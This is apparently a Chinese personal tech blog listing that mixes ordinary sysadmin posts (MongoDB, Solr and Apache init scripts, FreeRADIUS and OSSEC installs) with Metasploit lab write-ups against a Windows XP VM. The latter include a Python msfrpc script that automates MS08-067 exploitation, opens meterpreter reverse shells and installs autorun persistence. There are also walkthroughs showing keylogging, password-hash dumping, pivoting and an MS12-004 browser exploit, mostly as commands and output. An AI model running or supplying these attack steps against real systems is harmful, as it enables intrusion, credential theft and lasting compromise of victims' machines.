MongoDB 开机自启动

2016-09-20

mongodb

1	vim /etc/rc.d/init.d/mongodb

如果需要后台的方式启动，则为
/dat0/mongodb/bin/mongod –dbpath=/data/db/ –fork –logpath=/data/logs/mongodb.log

#!/bin/sh  
#  
#chkconfig: 2345 80 90  
#description: mongodb  
start() {  
  /dat0/mongodb/bin/mongod
}  
stop() {  
   /dat0/mongodb/bin/mongod  --shutdown  
}  
case "$1" in  
  start)  
 start  
 ;;  
  stop)  
 stop  
 ;;  
  restart)  
 stop  
 start  
 ;;  
  *)  
 echo $"Usage: $0 {start|stop|restart}"  
 exit 1  
esac

1
2
3

chkconfig --add mongodb  
chmod +x  mongodb  
chkconfig mongodb on

其他

相同道理的还有，solr和Apache等自启动

#!/bin/sh
#
#chkconfig: 2345 80 90
#description: solr
start() {
/dat0/solr/bin/solr start -cloud -s /dat0/solr/server/cloud/node1/solr
/dat0/solr/bin/solr start -cloud -s /dat0/solr/server/cloud/node2/solr -p 7574 -z localhost:9983
/dat0/solr/bin/solr start -cloud -s /dat0/solr/server/cloud/node3/solr -p 8984 -z localhost:9983
}
stop() {
/dat0/solr/bin/solr stop -all
}
case "$1" in
  start)
 start
 ;;
  stop)
 stop
 ;;
  restart)
 stop
 start
 ;;
  *)
 echo $"Usage: $0 {start|stop|restart}"
 exit 1
esac

!/bin/sh
#
#chkconfig: 2345 80 90
#description: apache
start() {
/usr/local/apache2/bin/httpd
}
stop() {
killall httpd
}
case "$1" in
  start)
 start
 ;;
  stop)
 stop
 ;;
  restart)
 stop
 start
 ;;
  *)
 echo $"Usage: $0 {start|stop|restart}"
 exit 1
esac

展开全文 >>

FreeRADIUS

2016-09-18

Radius

Remote Authentication Dial In User Service 远程访问拨号用户服务

RADIUS是一种C/S结构的协议，它的客户端最初就是NAS（Net Access Server）服务器，任何运行RADIUS客户端软件的计算机都可以成为RADIUS的客户端。RADIUS协议认证机制灵活，可以采用PAP、CHAP或者Unix登录认证等多种方式。RADIUS是一种可扩展的协议，它进行的全部工作都是基于Attribute-Length-Value的向量进行的。RADIUS也支持厂商扩充厂家专有属性。

Freeradius Install

Ubuntu.

1	wget ftp://ftp.freeradius.org/pub/freeradius/freeradius-server-3.0.11.tar.gz

1	tar zxf freeradius-server-3.0.11.tar.gz

1	cd freeradius-server-3.0.11/

1	./configure

Bug Fix
在configure时可能会出现
failed linking to libcrypto. Use –with-openssl-lib-dir=, or –with-openssl=no (builds without OpenSSL)
解决办法
1
2
3
Red Hat, Fedora, CentOS - openssl-devel
Debian, Ubuntu - libssl-dev
Arch - openssl
error: FreeRADIUS requires libtalloc

1	yum install libtalloc-devel -y

1	sudo make && make install

运行

1	radiusd -X

测试

1	adtest hello hello localhost 0 testing123

To Do

修改的模块是modules里面的rlm_realm，这个module完成了Proxy的相关业务逻辑，我们需要开发HUE的rlm_realm，并打包。
1
./src/modules/rlm_realm/rlm_realm.c

PAM

Pluggable Authentication Modules 可插拔认证模块
http://www.ibm.com/developerworks/cn/linux/l-pam/

PAM的文件

1
2
3

/etc/pam.conf或者/etc/pam.d/ PAM配置文件
/usr/lib/security/pam_*.so 可动态加载的PAM service module
对于RedHat，其目录不是/usr/lib，而是/lib

展开全文 >>

Centos 6.6 Install OSSEC

2016-08-27

前言

OSSEC是一款开源的基于主机的入侵检测系统，可以简称为HIDS。它具备日志分析，文件完整性检查，策略监控，rootkit检测，实时报警以及联动响应等功能。它支持多种操作系统：Linux、Windows、MacOS、Solaris、HP-UX、AIX。属于企业安全之利器。

环境
CentOS 6.6

安装关联库和软件
首先我们安装需要用到的关联库和软件，由于我们最终是需要把日志导入到MySQL中进行分析，以及需要通过web程序对报警结果进行展示，同时需要把本机当做SMTP，所以需要在本机安装MySQL、Apache和sendmail服务。在当前的终端中执行如下命令：
1
yum install wget gcc make mysql mysql-server mysql-devel httpd php php-mysql sendmail

启动服务

1
2
3

[root@ossec-server ~]# /etc/init.d/httpd start
[root@ossec-server ~]# /etc/init.d/mysqld start
[root@ossec-server ~]# /etc/init.d/sendmail start

Mysql相关配置

[root@ossec-server ~]# mysql -uroot -p
mysql> create database ossec;
mysql> grant INSERT,SELECT,UPDATE,CREATE,DELETE,EXECUTE on ossec.* to ossec@localhost;
mysql> set password for ossec@localhost=PASSWORD('ossec');
mysql> flush privileges;
mysql> exit

安装OSSEC服务端

首先通过官网的链接下载当前的最新稳定版本 2.8.3 的服务端包，同时解压。

wget https://akamai.bintray.com/87/87c7a1904d5c08c7cff3e42bd47c055b14b08faa?__gda__=exp=1465265745~hmac=3dacb2ddfc1c2aff8eeeff60f6c1ec8cbebf3dab98370b6894f3d87399be85ed&response-content-disposition=attachment%3Bfilename%3D%22ossec-hids-2.8.3.tar.gz%22&response-content-type=application%2Fgzip
重命名文件
mv 87c7a1904d5c08c7cff3e42bd47c055b14b08faa\?__gda__\=exp\=1465265745~hmac\=3dacb2ddfc1c2aff8eeeff60f6c1ec8cbebf3dab98370b6894f3d87399be85ed ossec.tar.gz
解压
[root@CentOS-6 ~]# tar -zxf ossec.tar.gz
[root@CentOS-6 ~]# ls
–                                         ossec-hids-2.8.3
anaconda-ks.cfg                           ossec.tar.gz

为了使OSSEC支持MySQL，需要在安装前执行make setdb命令，如下

[root@CentOS-6 ossec-hids-2.8.3]# cd src
[root@CentOS-6 src]# ls
addagent      error_messages    LOCATION      os_crypto    os_regex   syscheckd
agentlessd    external          logcollector  os_csyslogd  os_xml     tests
analysisd     headers           Makeall       os_dbd       os_zlib    util
client-agent  init              Makefile      os_execd     remoted    VERSION
config        InstallAgent.sh   monitord      os_maild     rootcheck  win32
Config.Make   InstallServer.sh  os_auth       os_net       shared
[root@CentOS-6 src]# make setdb
Info: Compiled with MySQL support.
Info: Compiled with PostgreSQL support.
[root@CentOS-6 src]# cd ..

执行安装脚本

[root@CentOS-6 ossec-hids-2.8.3]# ./install.sh
which: no host in (/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin)
  ** Para instalação em português, escolha [br].
  ** 要使用中文进行安装, 请选择 [cn].
  ** Fur eine deutsche Installation wohlen Sie [de].
  ** Για εγκατάσταση στα Ελληνικά, επιλέξτε [el].
  ** For installation in English, choose [en].
  ** Para instalar en Español , eliga [es].
  ** Pour une installation en français, choisissez [fr]
  ** A Magyar nyelvű telepítéshez válassza [hu].
  ** Per l'installazione in Italiano, scegli [it].
  ** 日本語でインストールします．選択して下さい．[jp].
  ** Voor installatie in het Nederlands, kies [nl].
  ** Aby instalować w języku Polskim, wybierz [pl].
  ** Для инструкций по установке на русском ,введите [ru].
  ** Za instalaciju na srpskom, izaberi [sr].
  ** Türkçe kurulum için seçin [tr].
  (en/br/cn/de/el/es/fr/hu/it/jp/nl/pl/ru/sr/tr) [en]: cn
which: no host in (/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin)

安装完成标识

感谢使用 OSSEC HIDS. 如果您有任何疑问,建议或您找到任何bug, 请通过　contact@ossec.net 或邮件列表 ossec-list@ossec.net 联系我们.
( http://www.ossec.net/en/mailing_lists.html ).
您可以在　http://www.ossec.net 获得更多信息
--- 请按　ENTER 结束安装 (下面可能有更多信息). ---
直到碰到上面内容，说明安装完成。

配置服务端，使其工作正常

执行下面命令启用数据库支持
1
[root@CentOS-6 bin]# /var/ossec/bin/ossec-control enable database
导入MySQL表结构到MySQL中
1
[root@CentOS-6 bin]# mysql -uossec -p ossec < ~/ossec-hids-2.8.3/src/os_dbd/mysql.schema
修改部分配置文件的权限，否则会启动服务失败：
1
[root@CentOS-6 etc]# chmod u+w /var/ossec/etc/ossec.conf
启动服务

1 2	[root@CentOS-6 /]# /etc/init.d/ossec-hids start Starting ossec-hids: [确定]

展开全文 >>

通过msf获取指定主机端口、服务、和版本信息

2016-08-20

探测主机信息

1	db_nmap -sS -A -PO 192.168.1.43

[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-06-04 09:08 HKT
[*] Nmap: Nmap scan report for dh-ca8822ab9589 (192.168.1.43)
[*] Nmap: Host is up (0.00021s latency).
[*] Nmap: Not shown: 987 closed ports
[*] Nmap: PORT     STATE SERVICE         VERSION
[*] Nmap: 21/tcp   open  ftp             FileZilla ftpd 0.9.41 beta
[*] Nmap: 25/tcp   open  smtp            Microsoft ESMTP 6.0.2600.5512
[*] Nmap: | smtp-commands: dh-ca8822ab9589 Hello [192.168.1.8], SIZE 2097152, PIPELINING, DSN, ENHANCEDSTATUSCODES, 8bitmime, BINARYMIME, CHUNKING, VRFY, OK,
[*] Nmap: |_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT VRFY
[*] Nmap: 80/tcp   open  http            Microsoft IIS httpd 5.1
[*] Nmap: | http-methods:
[*] Nmap: |_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
[*] Nmap: |_http-server-header: Microsoft-IIS/5.1
[*] Nmap: |_http-title: \xD5\xFD\xD4\xDA\xBD\xA8\xC9\xE8\xD6\xD0
[*] Nmap: | http-webdav-scan:
[*] Nmap: |   Server Date: Fri, 03 Jun 2016 01:11:01 GMT
[*] Nmap: |   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
[*] Nmap: |   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
[*] Nmap: |   Server Type: Microsoft-IIS/5.1
[*] Nmap: |_  WebDAV type: Unkown
[*] Nmap: 135/tcp  open  msrpc           Microsoft Windows RPC
[*] Nmap: 139/tcp  open  netbios-ssn     Microsoft Windows 98 netbios-ssn
[*] Nmap: 443/tcp  open  https?
[*] Nmap: 445/tcp  open  microsoft-ds    Microsoft Windows XP microsoft-ds
[*] Nmap: 777/tcp  open  multiling-http?
[*] Nmap: 1025/tcp open  msrpc           Microsoft Windows RPC
[*] Nmap: 3389/tcp open  ms-wbt-server   Microsoft Terminal Service
[*] Nmap: 6002/tcp open  http            SafeNet Sentinel Protection Server httpd 7.3
[*] Nmap: |_http-server-header: SentinelProtectionServer/7.3
[*] Nmap: |_http-title: Sentinel License Monitor
[*] Nmap: 7001/tcp open  afs3-callback?
[*] Nmap: 7002/tcp open  http            SafeNet Sentinel Keys License Monitor httpd 1.0 (Java Console)
[*] Nmap: |_http-title: Sentinel Keys License Monitor
[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
[*] Nmap: SF-Port777-TCP:V=7.01%I=7%D=6/4%Time=57522A42%P=x86_64-pc-linux-gnu%r(Kerb
[*] Nmap: SF:eros,5,"\x01\0\t\xe0\x06")%r(SMBProgNeg,5,"\x01\0\t\xe0\x06")%r(Termina
[*] Nmap: SF:lServer,A,"\x01\0\t\xe0\x06\x01\0\t\xe0\x06")%r(WMSRequest,5,"\x01\0\t\
[*] Nmap: SF:xe0\x06");
[*] Nmap: MAC Address: 00:0C:29:84:07:87 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OSs: Windows, Windows 98, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_xp
[*] Nmap: Host script results:
[*] Nmap: |_nbstat: NetBIOS name: DH-CA8822AB9589, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:84:07:87 (VMware)
[*] Nmap: | smb-os-discovery:
[*] Nmap: |   OS: Windows XP (Windows 2000 LAN Manager)
[*] Nmap: |   OS CPE: cpe:/o:microsoft:windows_xp::-
[*] Nmap: |   Computer name: dh-ca8822ab9589
[*] Nmap: |   NetBIOS computer name: DH-CA8822AB9589
[*] Nmap: |   Workgroup: WORKGROUP
[*] Nmap: |_  System time: 2016-06-03T09:11:02+08:00
[*] Nmap: | smb-security-mode:
[*] Nmap: |   account_used: guest
[*] Nmap: |   authentication_level: user
[*] Nmap: |   challenge_response: supported
[*] Nmap: |_  message_signing: disabled (dangerous, but default)
[*] Nmap: |_smbv2-enabled: Server doesnt support SMBv2 protocol
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   0.21 ms dh-ca8822ab9589 (192.168.1.43)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 172.64 seconds
msf >

提取相应信息

1	services -c port,name,info 192.168.1.43


Services
========
host          port  name            info
----          ----  ----            ----
192.168.1.43  21    ftp             FileZilla ftpd 0.9.41 beta
192.168.1.43  25    smtp            220 dh-ca8822ab9589 Microsoft ESMTP MAIL Service, Version: 6.0.2600.5512 ready at  Fri, 3 Jun 2016 09:25:13 +0800
192.168.1.43  80    http            Microsoft IIS httpd 5.1
192.168.1.43  135   msrpc           Microsoft Windows RPC
192.168.1.43  139   netbios-ssn     Microsoft Windows 98 netbios-ssn
192.168.1.43  443   https           
192.168.1.43  445   microsoft-ds    Microsoft Windows XP microsoft-ds
192.168.1.43  777   multiling-http  
192.168.1.43  1025  msrpc           Microsoft Windows RPC
192.168.1.43  3389  ms-wbt-server   Microsoft Terminal Service
192.168.1.43  6002  http            SafeNet Sentinel Protection Server httpd 7.3
192.168.1.43  7001  afs3-callback   
192.168.1.43  7002  http            SafeNet Sentinel Keys License Monitor httpd 1.0 Java Console

对网段主机进行系统识别扫描

1	msf > use auxiliary/scanner/smb/smb_version

1 2	msf auxiliary(smb_version) > set RHOSTS 192.168.1.0/24 RHOSTS => 192.168.1.0/24

1 2	msf auxiliary(smb_version) > set THREADS 30 THREADS => 30

msf auxiliary(smb_version) > run
[*] 192.168.1.27:445 is running Windows 7 Enterprise SP1 (build:7601) (name:JSEPC10048) (domain:WORKGROUP)
[*] 192.168.1.34:445 is running Windows 7 Ultimate SP1 (build:7601) (name:FLAG-PC) (domain:WORKGROUP)
[*] 192.168.1.31:445 is running Windows 10 Pro (build:10586) (name:DESKTOP-DP2RPVA) (domain:WORKGROUP)
[*] 192.168.1.13:445 is running Windows 7 Ultimate SP1 (build:7601) (name:PAYEGIS-PC) (domain:WORKGROUP)
[*] 192.168.1.42:445 could not be identified:  ()
[*] Scanned  43 of 256 hosts (16% complete)
[*] 192.168.1.66:445 is running Windows 2008 R2 Enterprise SP1 (build:7601) (name:HENG-VMWARE) (domain:WORKGROUP)
[*] 192.168.1.77:445 is running Windows 2008 R2 Standard SP1 (build:7601) (name:HENGWORK-2008) (domain:WORKGROUP)
[*] Scanned  77 of 256 hosts (30% complete)
[*] Scanned  80 of 256 hosts (31% complete)
[*] 192.168.1.88:445 is running Windows 7 Ultimate SP1 (build:7601) (name:HENG-PC) (domain:WORKGROUP)
[*] Scanned 105 of 256 hosts (41% complete)
[*] Scanned 135 of 256 hosts (52% complete)
[*] Scanned 158 of 256 hosts (61% complete)
[*] 192.168.1.173:445 is running Windows 2008 R2 Standard SP1 (build:7601) (name:WIN-O41L6VFBLUS) (domain:WORKGROUP)
[*] Scanned 194 of 256 hosts (75% complete)
[*] Scanned 219 of 256 hosts (85% complete)
[*] Scanned 232 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

展开全文 >>

[Demo] MSF检测指定服务的漏洞

2016-08-11

#相关资源

SpiderLabs/msfrpc

Code

# -*- coding: utf-8 -*-
'''
用MSF检测指定服务的漏洞
本脚本以 MS08-067为例
'''
__author__ = "SanNa"
import os
import msfrpc
import optparse
import sys
from time import sleep
LOGIN = 'msf'
PASSWD = 'abc123'
def builder(RHOST, LHOST, LPORT):
    '''根据相关信息创建文件
    :param RHOST: 目标ip
    :param LHOST: 监听IP
    :param LPORT: 监听端口
    '''
    postcomms = """getsystem
            run persistence -S -U -X -i 10 -p 80 -r """+LHOST+"""
            cd c:\\
            upload /tmp/ms08067_patch.exe c:\\
            upload /tmp/ms08067_install.bat c:\\
            execute -f ms08067_install.bat
            """
    batcomm = "ms08067_patch.exe /quiet"
    with open ('/tmp/smbpost.rc', 'w') as post, open('/tmp/ms08067_install.bat', 'w') as bat:
        post.write(postcomms)
        bat.write(batcomm)
def sploiter(RHOST, LHOST, LPORT, session):
    '''连接到msfconsole
    :param RHOST: 目标ip
    :param LHOST: 监听IP
    :param LPORT: 监听端口
    :param session: session
    '''
    client = msfrpc.Msfrpc({})
    client.login(LOGIN, PASSWD)
    ress = client.call('console.create')
    console_id = ress['id']
    # Exploit MS08-067
    commands = """use exploit/windows/smb/ms08_067_netapi
                set PAYLOAD windows/meterpreter/reverse_tcp
                set RHOST """+RHOST+"""
                set LHOST """+LHOST+"""
                set LPORT """+LPORT+"""
                set ExitOnSession false
                exploit -z
            """
    print "[+] Exploiting MS08-067 on: " + RHOST
    client.call('console.write',[console_id,commands])
    res = client.call('console.read',[console_id])
    result = res['data'].split('\n')
    # 运行攻击脚本
    runPost = """use post/multi/gather/run_console_rc_file
                set RESOURCE /tmp/smbpost.rc
                set SESSION """+session+"""
                exploit
              """
    print "[+] Running post-exploit script on: " + RHOST
    client.call('console.write',[console_id,runPost])
    rres = client.call('console.read',[console_id])
    #Setup Listener for presistent connection back over port 80
    sleep(10)
    listen = """use exploit/multi/handler
            set PAYLOAD windows/meterpreter/reverse_tcp
            set LPORT 80
            set LHOST """+LHOST+"""
            exploit
            """
    print "[+] Setting up listener on: " + LHOST + ":80"
    client.call('console.write',[console_id,listen])
    lres = client.call('console.read',[console_id])
    print lres
def main():
    parser = optparse.OptionParser(sys.argv[0] +\
            ' -p LPORT -r RHOST -l LHOST -s session')
    parser.add_option('-p', dest='LPORT', type='string', \
            help ='specify a port to listen on')
    parser.add_option('-r', dest='RHOST', type='string', \
            help='Specify a remote host')
    parser.add_option('-l', dest='LHOST', type='string', \
            help='Specify a local host')
    parser.add_option('-s', dest='session', type='string', \
            help ='specify session ID')
    (options, args) = parser.parse_args()
    session=options.session
    RHOST=options.RHOST; LHOST=options.LHOST; LPORT=options.LPORT
    if (RHOST == None) and (LPORT == None) and (LHOST == None):
        print parser.usage
        sys.exit(0)
    builder(RHOST, LHOST, LPORT)
    sploiter(RHOST, LHOST, LPORT, session)
if __name__ == "__main__":
    main()

执行方式

➜  ~  python 333msf.py -p 4444 -r 192.168.1.43 -l 192.168.1.8 -s 8
[+] Exploiting MS08-067 on: 192.168.1.43
[+] Running post-exploit script on: 192.168.1.43
[+] Setting up listener on: 192.168.1.8:80
[{"prompt": "\u0001\u0002msf\u0001\u0002 post(\u0001\u0002\u0001\u0002run_console_rc_file\u0001\u0002) \u0001\u0002> ", "busy": true, "data": "PAYLOAD => windows/meterpreter/reverse_tcp\nRHOST => 192.168.1.43\nLHOST => 192.168.1.8\nLPORT => 4444\nExitOnSession => false\n[*] Started reverse TCP handler on 192.168.1.8:4444 \n[*] Automatically detecting the target...\n[*] Fingerprint: Windows XP - Service Pack 3 - lang:English\n[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)\n[*] Attempting to trigger the vulnerability...\n[*] Sending stage (957487 bytes) to 192.168.1.43\n[*] Meterpreter session 8 opened (192.168.1.8:4444 -> 192.168.1.43:1139) at 2016-06-03 21:13:38 +0800\n[*] Session 8 created in the background.\nRESOURCE => /tmp/smbpost.rc\nSESSION => 7\n[*] Running module against DH-CA8822AB9589\n[*] Running command getsystem\n[*] Running command                 run persistence -S -U -X -i 10 -p 80 -r 192.168.1.8\n"}]

执行脚本时msf端命令行回显

[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf7/logs/persistence/DH-CA8822AB9589_20160603.2703/DH-CA8822AB9589_20160603.2703.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=80
[*] Persistent agent script is 148419 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\IezQttslf.vbs
[*] Executing script C:\WINDOWS\TEMP\IezQttslf.vbs
[+] Agent executed with PID 2720
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DIwbwLlJMJ
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DIwbwLlJMJ
[*] Installing as service..
[*] Creating service YsimPwZAk
[*] Meterpreter session 3 opened (192.168.1.8:80 -> 192.168.1.43:1083) at 2016-06-03 18:27:06 +0800

session

msf > sessions
Active sessions
===============
  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  7   meterpreter x86/win32  DH-CA8822AB9589\Administrator @ DH-CA8822AB9589  192.168.1.8:80 -> 192.168.1.43:1138 (192.168.1.43)
  8   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DH-CA8822AB9589            192.168.1.8:4444 -> 192.168.1.43:1139 (192.168.1.43)
msf > sessions -i 8
[*] Starting interaction with 6...

Test-MS08-067

2016-08-10

环境

Kali2.0
192.168.1.8
WinXPenSP3
192.168.1.43

Start

1
2
3

msf auxiliary(syn) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

Show Option

msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting

Set Option

msf exploit(ms08_067_netapi) > set RhOST 192.168.1.43
RhOST => 192.168.1.43
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.8
LHOST => 192.168.1.8

Exploit

msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.1.8:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (957487 bytes) to 192.168.1.43
[*] Meterpreter session 1 opened (192.168.1.8:4444 -> 192.168.1.43:1115) at 2016-06-03 14:18:57 +0800
meterpreter > ls
Listing: C:\WINDOWS\system32
============================
Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
100666/rw-rw-rw-  1482      fil   2011-08-14 13:40:01 +0800  $winnt$.inf
40777/rwxrwxrwx   0         dir   2011-08-14 21:19:31 +0800  1025

Shell

meterpreter > shell
Process 1004 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.43
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1
C:\WINDOWS\system32>

常用手法

截屏

1 2	meterpreter > screenshot Screenshot saved to: /root/Fyjiynwg.jpeg

获取系统信息

meterpreter > sysinfo
Computer        : DH-CA8822AB9589
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32

目标系统正在运行的进程

meterpreter > ps
Process List
============
 PID   PPID  Name                  Arch  Session  User                           Path
 ---   ----  ----                  ----  -------  ----                           ----
 0     0     [System Process]                                                    
 4     0     System                x86   0        NT AUTHORITY\SYSTEM            
 128   676   VMUpgradeHelper.exe   x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
 560   4     smss.exe              x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe

键盘记录

使用migrate将会话迁移至explorer.exe(pid)进程中再启动keylog_recorder模块，需要终止时CTRL+C

meterpreter > migrate 1652
[*] Migrating from 1032 to 1652...
[*] Migration completed successfully.
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against DH-CA8822AB9589
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf7/loot/20160603143131_default_192.168.1.43_host.windows.key_581630.txt
[*] Recording keystrokes...
^C[*] Saving last few keystrokes...
[*] Interrupt
[*] Stopping keystroke sniffer...

获取密码哈希值

meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::
IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::
meterprete

将目标机器作为跳板

meterpreter > run get_local_subnets
Local subnet: 192.168.1.0/255.255.255.0
meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms08_067_netapi) > route add 192.168.3.0 255.255.255.0 1
[*] Route added
msf exploit(ms08_067_netapi) > route print
Active Routing Table
====================
   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.3.0        255.255.255.0      Session 1

展开全文 >>

Metasploit-MIDI文件解析远程代码执行

2016-08-09

启动msf

[*] Processing setup.rc for ERB directives.
resource (setup.rc)> db_connect msf:msf123@127.0.0.1/msf
resource (setup.rc)> load msgrpc User=msf Pass='abc123'
[*] MSGRPC Service:  127.0.0.1:55552
[*] MSGRPC Username: msf
[*] MSGRPC Password: abc123
[*] Successfully loaded plugin: msgrpc

搜索和使用漏洞模块

msf > search 12-004
[!] Module database cache not built yet, using slow search
Matching Modules
================
   Name                                   Disclosure Date  Rank    Description
   ----                                   ---------------  ----    -----------
   exploit/windows/browser/ms12_004_midi  2012-01-10       normal  MS12-004 midiOutPlayNextPolyEvent Heap Overflow
msf > use exploit/windows/browser/ms12_004_midi

显示和设置相关Option

msf exploit(ms12_004_midi) > show options
Module options (exploit/windows/browser/ms12_004_midi):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   OBFUSCATE  false            no        Enable JavaScript obfuscation
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf exploit(ms12_004_midi) > set SRVHOST 192.168.1.8
SRVHOST => 192.168.1.8
msf exploit(ms12_004_midi) > set URIPATH /
URIPATH => /
msf exploit(ms12_004_midi) > set LPORT 1234
LPORT => 1234
msf exploit(ms12_004_midi) > exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.1.8:1234
[*] Using URL: http://192.168.1.8:8080/
[*] Server started.

使用目标主机IE浏览器打开URL后控制台输出为

*] 192.168.1.43     ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 192.168.1.43     ms12_004_midi - Sending html to 192.168.1.43:2933...
[*] 192.168.1.43     ms12_004_midi - Request as: Windows-Media-Player/9.00.00.4503
[*] 192.168.1.43     ms12_004_midi - Sending midi corruption file...
[*] Sending stage (957487 bytes) to 192.168.1.43
[*] Meterpreter session 2 opened (192.168.1.8:1234 -> 192.168.1.43:2934) at 2016-06-04 16:38:01 +0800
[*] Session ID 2 (192.168.1.8:1234 -> 192.168.1.43:2934) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (372)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3948
[+] Successfully migrated to process

查看和使用session

sf exploit(ms12_004_midi) > sessions
Active sessions
===============
  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  DH-CA8822AB9589\Administrator @ DH-CA8822AB9589  192.168.1.8:1234 -> 192.168.1.43:2927 (192.168.1.43)
  2   meterpreter x86/win32  DH-CA8822AB9589\Administrator @ DH-CA8822AB9589  192.168.1.8:1234 -> 192.168.1.43:2934 (192.168.1.43)
msf exploit(ms12_004_midi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ifconfig
Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 00:0c:29:84:07:87
MTU          : 1500
IPv4 Address : 192.168.1.43
IPv4 Netmask : 255.255.255.0
meterpreter > shell
Process 204 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>

展开全文 >>

OpenVAS 折腾记录

2016-08-03

OpenVAS设计理念

